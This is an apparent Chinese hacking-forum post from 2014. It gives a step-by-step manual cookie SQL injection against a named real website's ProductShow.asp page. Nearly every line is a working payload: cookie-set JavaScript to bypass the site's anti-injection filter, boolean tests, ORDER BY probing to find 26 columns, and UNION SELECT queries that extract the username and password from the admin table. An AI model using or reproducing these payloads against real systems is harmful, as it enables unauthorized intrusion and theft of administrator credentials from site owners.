|
发表于 2014-6-30 05:54:45
|
显示全部楼层
[注入语句:javascript:alert(document.cookie="ID="+escape("153"));
找个带参数的链接……http://www.zyjfsh.com/ProductShow.asp?ID=153
看见没有,有防注入系统……但大多可以通过中转注入搞定 我这就手工来COOKIE注入吧!
现在来检测能不能注入……javascript:alert(document.cookie="ID="+escape("153 and 1=1"));
and 1=1返回 正常页面 javascript:alert(document.cookie="ID="+escape("153 and 1=2"));
and 1=2出错 说明存在注入漏洞
然后我们构造语句来查询字段:javascript:alert(document.cookie="ID="+escape("153 order by 10"));正常 再往上猜javascript:alert(document.cookie="ID="+escape("153 order by 20"));
20也正常 再加 javascript:alert(document.cookie="ID="+escape("153 order by 30"));
30出错,说明大于20小于30 javascript:alert(document.cookie="ID="+escape("153 order by 25"));
25也正常 大于25小于30 javascript:alert(document.cookie="ID="+escape("153 order by 26"));
26正常 javascript:alert(document.cookie="ID="+escape("153 order by 27"));
27出错 说明就是26
接着构造语句查表 javascript:alert(document.cookie="ID="+escape("153 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin"));
2 7 9 15 3是显示位 我们随便找两个显示位来显示就行了
然后猜表里的字段:javascript:alert(document.cookie="ID="+escape("153 union select 1,username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin"));/color] |
|